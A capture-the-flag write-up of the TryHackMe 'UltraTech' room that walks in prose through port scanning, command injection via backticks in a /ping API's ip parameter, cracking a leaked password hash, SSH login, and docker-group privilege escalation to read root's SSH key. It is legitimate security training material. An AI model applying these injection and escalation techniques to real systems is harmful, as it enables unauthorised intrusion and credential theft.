UltraTech Solution (TryHackMe-Medium)
UltraTech | Difficulty: Medium
📜 Summary
1- Exploit the /ping API endpoint via ip parameter (Command Injection)
2- SSH into the machine with credentials you took by reading file contents from target machine.
3- Use docker group privilege escalation technique to be root.
Enumeration
Let’s start with rustscan to scan open ports on the target.
I will also run nmap only for these ports.
Good, now we know the services and their versions. Let’s check the HTTP ones.
Express API and Front End Website
The website on port 31331 looks like a classic website. Let’s enumerate the directories via gobuster, ffuf or dirsearch. I will prefer dirsearch for simplicity.
We found a /js directory. Let’s check it.
Yep! We found a JavaScript file about the API.
We found two API endpoints which are /ping and /auth. Awesome!
Command Injection
We can make requests to these URLs and intercept them with Burp Suite.
When we make requests to /ping endpoint and give the ip parameter as localhost, probably the backend server executes ping command in a shell. What if we try to inject shell commands here instead of giving a valid ip adress ? I mean that backend server executes something like this:
ping <ip adress you gave>
Our purpose is to inject something malicious to the <ip adress you gave> field. If we can achieve this, backend server might return us something valuable.
After i tried some of the command injection techniques (It was not a straightforward one, because the back-end server filters some characters.), i found a way to execute commands.
Backticks are not filtered by the server. So we can use it.
There is a file in the current directory. It is a database file. Let’s try to read the contents.
Hmm. It is weird. We have r00t in the output. After that there is a string of chars which looks like a hash. We can guess that r00t is the username and the string is his password’s hash. But it may be wrong. Let’s try to crack the hash according to this assumption. I will use CrackStation.
Yep! Our assumption was true. But wait ! You might be asking : “How did you guess it ?!”. I am not a genius, calm down :). When i visit the website, i saw “Who are we ?” section and there were some names which are potentially usernames.
Don’t forget that clever assumptions are the half of hacking.
We now have a username and password. Let’s try to SSH into the machine using these credentials.
Yep, we are in now !
Becoming the ROOT
When we run the id command, we see that we are in docker group. This means that we are able to run docker commands which is so powerful in terms of privilege escalation.
While researching i found a privilege escalation technique here. Its proof of concept needs two things: A user which can run docker commands and alpine image. Let’s download it from the hub to our local machine and then upload it to the target machine. After that we should build the image. We need to download a Dockerfile and the tar.gz file of the image. You can download it from here. After downloading, upload it to the target machine via python3 -m http.server. Also do not forget to download POC and upload it to the server.
After executing the POC script on the target machine, it will ask you new root user credentials. We can enter anything. But we should enter the password we set when it asks us.
Now we are root. TryHackMe question ask us the first nine characters of the SSH private key of root user. Let’s go to the /root directory. There exists a hidden directory which is named as .ssh. When we cd to it, we will see id_rsa file which includes RSA private key.
Thanks for reading ! I will continue writing !
